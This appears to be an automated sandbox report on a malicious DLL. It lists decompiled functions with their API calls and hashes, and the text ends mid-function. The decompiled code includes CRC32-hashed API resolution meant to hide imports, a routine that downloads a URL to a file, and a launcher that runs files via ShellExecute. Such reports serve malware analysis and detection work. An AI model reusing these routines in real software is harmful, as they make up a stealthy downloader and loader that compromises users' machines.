                                                                                                                        Function 6F3369C0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E6F3369C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				char _v8;
				char _v11;
				char _v12;
				short _v15;
				char _v16;
				CHAR* _t19;
				CHAR* _t21;
				CHAR* _t22;
				CHAR* _t24;
				signed char _t26;
				signed int _t27;
				CHAR* _t30;
				CHAR* _t35;
				CHAR* _t39;
				CHAR* _t40;
				CHAR* _t43;
				CHAR* _t46;
				CHAR* _t48;

				_t19 = M6F3404CC; // 0x99d818
				_t40 = M6F3404DC; // 0x99b1c8
				_t46 = _a4;
				_v16 = 0x6e6468;
				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
				_t21 = M6F3404CC; // 0x99d818
				_t22 = M6F3404DC; // 0x99b1c8
				asm("sbb ecx, ecx");
				_t35 =  ~_t46 & _a8;
				_v15 = 0x70;
				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21);
				_t24 = M6F3404CC; // 0x99d818
				asm("sbb esi, esi");
				_t48 =  ~_t46 &  &_v12;
				_t43 = M6F3404DC; // 0x99b1c8
				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
				_v11 = 0;
				_v15 = 0x73;
				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24);
				_t26 = _a16;
				_v15 = 0x74;
				_t27 = _t26 & 0x000000ff;
				if(_t26 == 0) {
					_t27 = 0xc;
				}
				wsprintfA( &_v12, "%d", _t27);
				_t39 = M6F3404CC; // 0x99d818
				_t30 = M6F3404DC; // 0x99b1c8
				return WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39);
			}





















                                                                                                                        0x6f3369c3
                                                                                                                        0x6f3369c8
                                                                                                                        0x6f3369cf
                                                                                                                        0x6f3369e2
                                                                                                                        0x6f3369ea
                                                                                                                        0x6f3369ec
                                                                                                                        0x6f3369f6
                                                                                                                        0x6f3369fb
                                                                                                                        0x6f3369fd
                                                                                                                        0x6f336a08
                                                                                                                        0x6f336a0d
                                                                                                                        0x6f336a14
                                                                                                                        0x6f336a21
                                                                                                                        0x6f336a28
                                                                                                                        0x6f336a2a
                                                                                                                        0x6f336a30
                                                                                                                        0x6f336a3b
                                                                                                                        0x6f336a40
                                                                                                                        0x6f336a45
                                                                                                                        0x6f336a47
                                                                                                                        0x6f336a4d
                                                                                                                        0x6f336a54
                                                                                                                        0x6f336a57
                                                                                                                        0x6f336a59
                                                                                                                        0x6f336a59
                                                                                                                        0x6f336a69
                                                                                                                        0x6f336a6f
                                                                                                                        0x6f336a75
                                                                                                                        0x6f336a8c

                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F3369EA
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,0099D818,?,0099D818), ref: 6F336A0D
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336A45
                                                                                                                        • wsprintfA.USER32 ref: 6F336A69
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(0099B1C8,?,?,0099D818), ref: 6F336A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                                        • String ID: hdn$s$t
                                                                                                                        • API String ID: 2965074233-1328931711
                                                                                                                        • Opcode ID: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction ID: 9e41e9caa8fadecac9bba49ffb96c8628ed8ed4e22ab71a04489e46710e73c76
                                                                                                                        • Opcode Fuzzy Hash: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction Fuzzy Hash: C62183B22186929FD700DF58C844E6BB7EDEFD5214F058A0CF49493241D674AA1CCBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338230, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F338230(WCHAR* _a4, WCHAR* _a8) {
				long _t4;
				WCHAR* _t11;
				WCHAR* _t12;
				void* _t13;

				_t12 = _a4;
				_t11 = _a8;
				if(_t12 == 0 || _t11 == 0) {
					L7:
					_push(_t11);
					_push(_t12);
					M6F3405F8();
					return _t4;
				} else {
					_t4 = GetFileAttributesW(_t12);
					if((_t4 & 0xffffffef) == 0) {
						goto L7;
					} else {
						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
						if(_t4 != 0) {
							goto L7;
						} else {
							SetLastError(_t4);
							_t13 = E6F33A2F0(_t12, 0, 0);
							if(_t13 != 0) {
								_push(0);
								_push(0);
								_push(1);
								E6F334230("open", _t13, 0);
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							return 0;
						}
					}
				}
			}







                                                                                                                        0x6f338231
                                                                                                                        0x6f338236
                                                                                                                        0x6f33823c
                                                                                                                        0x6f3382ae
                                                                                                                        0x6f3382ae
                                                                                                                        0x6f3382af
                                                                                                                        0x6f3382b0
                                                                                                                        0x6f3382b8
                                                                                                                        0x6f338242
                                                                                                                        0x6f338243
                                                                                                                        0x6f33824e
                                                                                                                        0x00000000
                                                                                                                        0x6f338250
                                                                                                                        0x6f33825d
                                                                                                                        0x6f338265
                                                                                                                        0x00000000
                                                                                                                        0x6f338267
                                                                                                                        0x6f338268
                                                                                                                        0x6f338278
                                                                                                                        0x6f33827f
                                                                                                                        0x6f338281
                                                                                                                        0x6f338283
                                                                                                                        0x6f338285
                                                                                                                        0x6f33828f
                                                                                                                        0x6f3382a1
                                                                                                                        0x6f3382a1
                                                                                                                        0x6f3382ab
                                                                                                                        0x6f3382ab
                                                                                                                        0x6f338265
                                                                                                                        0x6f33824e

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F338243
                                                                                                                        • PathFindFileNameW.SHLWAPI(?,run), ref: 6F338256
                                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 6F33825D
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6F338268
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,0099B7A8,00000001,0000009C), ref: 6F33A33E
                                                                                                                          • Part of subcall function 6F334230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                          • Part of subcall function 6F334230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                          • Part of subcall function 6F334230: WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                          • Part of subcall function 6F334230: GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                          • Part of subcall function 6F334230: CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33829A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3382A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
                                                                                                                        • String ID: open$run
                                                                                                                        • API String ID: 2941314601-2128457515
                                                                                                                        • Opcode ID: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction ID: eafe0a8456b46b7470652278ffb60c0f41678d4b5b7510c2a5e2062331bb59c3
                                                                                                                        • Opcode Fuzzy Hash: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction Fuzzy Hash: EB01DB37E49FB47BDA30E6749D09FCB362DAF92B31F010009FD55E6080DB69D41246A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331DB0, Relevance: 13.6, APIs: 9, Instructions: 147stringlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F331DB0() {
				short _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t72;
				signed int _t73;
				intOrPtr _t77;
				signed int _t78;
				CHAR* _t80;
				signed int _t83;
				signed int _t89;
				intOrPtr* _t90;
				char* _t96;
				intOrPtr* _t101;
				char* _t103;
				CHAR* _t106;
				char* _t108;
				CHAR* _t109;
				short _t112;
				struct HINSTANCE__* _t115;
				void* _t116;

				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
				_t58 = 1;
				 *(_t116 + 0x14) = 1;
				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
					L28:
					return _t58;
				} else {
					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
					 *(_t116 + 0x24) = _t83;
					if( *_t83 != 0x4550) {
						goto L28;
					}
					_t77 =  *((intOrPtr*)(_t83 + 0x78));
					_t78 = _t77 + _t101;
					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
					 *(_t116 + 0x14) = _t78;
					 *(_t116 + 0x1c) = _t89;
					 *(_t116 + 0xc) = 0;
					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
						L27:
						return _t58;
					}
					while(1) {
						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
						_t96 =  *(_t116 + 0x50);
						_t61 = _t60 ^  *(_t116 + 0x54);
						_t112 = 0;
						if(_t96 <= 0) {
							goto L25;
						}
						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
						while(_t61 !=  *_t90) {
							_t112 = _t112 + 1;
							_t90 = _t90 + 0x10;
							if(_t112 < _t96) {
								continue;
							}
							goto L25;
						}
						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
							L22:
							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
							_t101 =  *((intOrPtr*)(_t116 + 0x48));
							if(_t103 == 0) {
								 *(_t116 + 0x20) = 0;
							}
						} else {
							_t80 = StrDupA(_t103);
							if(_t80 == 0) {
								L24:
								_t78 =  *(_t116 + 0x1c);
								_t101 =  *((intOrPtr*)(_t116 + 0x48));
								goto L25;
							}
							 *(_t116 + 0x20) = 0;
							_t108 = StrChrA(_t80, 0x2e);
							if(_t108 == 0) {
								L20:
								LocalFree(_t80);
								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
									goto L24;
								}
								_t78 =  *(_t116 + 0x1c);
								goto L22;
							}
							 *_t108 = 0;
							_t109 = _t108 + 1;
							_t115 = GetModuleHandleA(_t80);
							if(_t115 != 0) {
								L18:
								 *(_t116 + 0x1c) = 1;
								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
								_t73 =  *(_t116 + 0x54);
								_push(_t73);
								_push(0x10);
								_push(_t116 + 0x3c);
								_push(_t115);
								 *(_t116 + 0x44) = _t72 ^ _t73;
								 *((intOrPtr*)(_t116 + 0x48)) = 0;
								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
								 *(_t116 + 0x50) = 0;
								E6F331DB0();
								_t103 =  *(_t116 + 0x50);
								_t116 = _t116 + 0x10;
								L19:
								_t112 =  *((intOrPtr*)(_t116 + 0x10));
								goto L20;
							}
							_t115 = LoadLibraryA(_t80);
							if(_t115 == 0) {
								goto L19;
							}
							goto L18;
						}
						L25:
						_t63 =  *(_t116 + 0x14) + 1;
						 *(_t116 + 0x14) = _t63;
						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
							_t89 =  *(_t116 + 0x24);
							continue;
						}
						_t58 =  *(_t116 + 0x20);
						goto L27;
					}
				}
			}
























                                                                                                                        0x6f331db4
                                                                                                                        0x6f331db8
                                                                                                                        0x6f331dbd
                                                                                                                        0x6f331dc3
                                                                                                                        0x6f331f91
                                                                                                                        0x6f331f91
                                                                                                                        0x6f331dd7
                                                                                                                        0x6f331dda
                                                                                                                        0x6f331de2
                                                                                                                        0x6f331de6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331ded
                                                                                                                        0x6f331df4
                                                                                                                        0x6f331df8
                                                                                                                        0x6f331e01
                                                                                                                        0x6f331e08
                                                                                                                        0x6f331e0e
                                                                                                                        0x6f331e12
                                                                                                                        0x6f331e16
                                                                                                                        0x6f331e1e
                                                                                                                        0x6f331f8c
                                                                                                                        0x00000000
                                                                                                                        0x6f331f8c
                                                                                                                        0x6f331e34
                                                                                                                        0x6f331e3b
                                                                                                                        0x6f331e48
                                                                                                                        0x6f331e4d
                                                                                                                        0x6f331e51
                                                                                                                        0x6f331e55
                                                                                                                        0x6f331e59
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331e5f
                                                                                                                        0x6f331e63
                                                                                                                        0x6f331e67
                                                                                                                        0x6f331e68
                                                                                                                        0x6f331e6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331e6f
                                                                                                                        0x6f331e87
                                                                                                                        0x6f331e8b
                                                                                                                        0x6f331e8f
                                                                                                                        0x6f331f50
                                                                                                                        0x6f331f56
                                                                                                                        0x6f331f5c
                                                                                                                        0x6f331f60
                                                                                                                        0x6f331f62
                                                                                                                        0x6f331f62
                                                                                                                        0x6f331eae
                                                                                                                        0x6f331eb5
                                                                                                                        0x6f331eb9
                                                                                                                        0x6f331f6c
                                                                                                                        0x6f331f6c
                                                                                                                        0x6f331f70
                                                                                                                        0x00000000
                                                                                                                        0x6f331f70
                                                                                                                        0x6f331ec2
                                                                                                                        0x6f331ed0
                                                                                                                        0x6f331ed4
                                                                                                                        0x6f331f3e
                                                                                                                        0x6f331f3f
                                                                                                                        0x6f331f4a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331f4c
                                                                                                                        0x00000000
                                                                                                                        0x6f331f4c
                                                                                                                        0x6f331ed6
                                                                                                                        0x6f331eda
                                                                                                                        0x6f331ee1
                                                                                                                        0x6f331ee5
                                                                                                                        0x6f331ef4
                                                                                                                        0x6f331ef5
                                                                                                                        0x6f331f08
                                                                                                                        0x6f331f0f
                                                                                                                        0x6f331f13
                                                                                                                        0x6f331f14
                                                                                                                        0x6f331f1a
                                                                                                                        0x6f331f1d
                                                                                                                        0x6f331f1e
                                                                                                                        0x6f331f22
                                                                                                                        0x6f331f26
                                                                                                                        0x6f331f2a
                                                                                                                        0x6f331f2e
                                                                                                                        0x6f331f33
                                                                                                                        0x6f331f37
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331f3a
                                                                                                                        0x00000000
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331eee
                                                                                                                        0x6f331ef2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331ef2
                                                                                                                        0x6f331f74
                                                                                                                        0x6f331f78
                                                                                                                        0x6f331f79
                                                                                                                        0x6f331f80
                                                                                                                        0x6f331e30
                                                                                                                        0x00000000
                                                                                                                        0x6f331e30
                                                                                                                        0x6f331f86
                                                                                                                        0x00000000
                                                                                                                        0x6f331f8b
                                                                                                                        0x6f331e34

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        • StrDupA.SHLWAPI(?,00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EAF
                                                                                                                        • StrChrA.SHLWAPI(00000000,0000002E,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331ECA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EDB
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EE8
                                                                                                                        • lstrlenA.KERNEL32(00000001,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331EFD
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6F331F08
                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,?,?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331F3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1770823755-0
                                                                                                                        • Opcode ID: a4d52f565ab13f5d7d2580e04ba3fbea70522657c8231f4cbba226d27ef2e0ad
                                                                                                                        • Instruction ID: 65e8725b82402b4f01efe4d29028d19829b0407ec8df8c8736d513323c304720
                                                                                                                        • Opcode Fuzzy Hash: a4d52f565ab13f5d7d2580e04ba3fbea70522657c8231f4cbba226d27ef2e0ad
                                                                                                                        • Instruction Fuzzy Hash: 4E5157729083958FC710EF58C880A5BB7FABF89708F044A1DF99597341D7B2E8158BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333180, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F333180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t21;
				void* _t22;

				_t21 = 0;
				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
				if(_t22 != 0) {
					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
					asm("bswap edi");
					HeapFree(GetProcessHeap(), 0, _t22);
				}
				return _t21;
			}





                                                                                                                        0x6f333190
                                                                                                                        0x6f33319b
                                                                                                                        0x6f33319f
                                                                                                                        0x6f3331d5
                                                                                                                        0x6f3331d7
                                                                                                                        0x6f3331dc
                                                                                                                        0x6f3331dc
                                                                                                                        0x6f3331e7

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F333192
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333195
                                                                                                                        • wsprintfA.USER32 ref: 6F3331B8
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F3331C4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6F3331D9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3331DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocComputeCrc32Freewsprintf
                                                                                                                        • String ID: %s%s%s%c
                                                                                                                        • API String ID: 3834306679-489954935
                                                                                                                        • Opcode ID: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction ID: ae3b06c34e2ca5a5d7f77b5956ace44fa511404ae0d515e7e5a597a12bec6c51
                                                                                                                        • Opcode Fuzzy Hash: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction Fuzzy Hash: DCF090B7B416A42BE624D6258C8DE7B769EEFC9661F008118FA18D7280CA64DC1286B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335A00, Relevance: 12.1, APIs: 8, Instructions: 81networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335A00() {
				char* _v16;
				CHAR* _v36;
				void* _v1048;
				void _v1068;
				long _v1076;
				long _v1080;
				void _v1084;
				void* _v1088;
				long _v1092;
				long _v1096;
				char* _t13;
				long _t23;
				void* _t27;
				long _t33;
				void* _t36;
				void* _t38;

				_t13 = M6F340518; // 0x749bb0
				_t33 = 0;
				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
				_v1048 = _t38;
				if(_t38 != 0) {
					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
					if(_t27 != 0) {
						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
						if(_t36 != 0xffffffff) {
							_v1080 = 0;
							_v1076 = 0;
							do {
								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
									goto L7;
								} else {
									_t23 = _v1096;
									if(_t23 != 0) {
										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
										goto L7;
									}
								}
								break;
								L7:
							} while (_v1096 > 0);
							_t33 = 1;
							CloseHandle(_t36);
							_t38 = _v1088;
						}
						InternetCloseHandle(_t27);
					}
					InternetCloseHandle(_t38);
				}
				return _t33;
			}



















                                                                                                                        0x6f335a06
                                                                                                                        0x6f335a0d
                                                                                                                        0x6f335a1a
                                                                                                                        0x6f335a1c
                                                                                                                        0x6f335a22
                                                                                                                        0x6f335a40
                                                                                                                        0x6f335a44
                                                                                                                        0x6f335a68
                                                                                                                        0x6f335a6d
                                                                                                                        0x6f335a75
                                                                                                                        0x6f335a79
                                                                                                                        0x6f335a83
                                                                                                                        0x6f335a97
                                                                                                                        0x00000000
                                                                                                                        0x6f335a99
                                                                                                                        0x6f335a99
                                                                                                                        0x6f335a9f
                                                                                                                        0x6f335aaf
                                                                                                                        0x00000000
                                                                                                                        0x6f335aaf
                                                                                                                        0x6f335a9f
                                                                                                                        0x00000000
                                                                                                                        0x6f335ab1
                                                                                                                        0x6f335ab1
                                                                                                                        0x6f335ab9
                                                                                                                        0x6f335abe
                                                                                                                        0x6f335ac4
                                                                                                                        0x6f335ac4
                                                                                                                        0x6f335ac9
                                                                                                                        0x6f335acf
                                                                                                                        0x6f335ad1
                                                                                                                        0x6f335ad7
                                                                                                                        0x6f335ae2

                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000000,00000000,00000000,00000000), ref: 6F335A14
                                                                                                                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6F335A3A
                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6F335A62
                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6F335A93
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F335AAF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335ABE
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AC9
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2705228764-0
                                                                                                                        • Opcode ID: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction ID: 52941c637d6536255a51803a9143df598c2cda5ccb6e77c6c0afdcd6468fd4c2
                                                                                                                        • Opcode Fuzzy Hash: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction Fuzzy Hash: CA21B372500789ABD320DE25CC88FAB7BACEBCA720F00091DFA1592141D771E915C7B1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333B60, Relevance: 12.1, APIs: 8, Instructions: 67memoryregistrythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F333B60(intOrPtr* _a8) {
				struct _SERVICE_STATUS* _v4;
				int _v8;
				CHAR* _t9;
				int _t10;
				void* _t13;
				int _t14;
				signed int _t18;
				short* _t20;
				int _t21;
				void _t22;
				void* _t23;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
				_t10 = SetCurrentDirectoryA(_t9);
				_t27 = _a8;
				 *0x6f34043c = 0x20;
				 *0x6f340440 = 2;
				 *0x6f340444 = 0x85;
				 *0x6f340448 = 0;
				 *0x6f34044c = 0;
				 *0x6f340450 = 0;
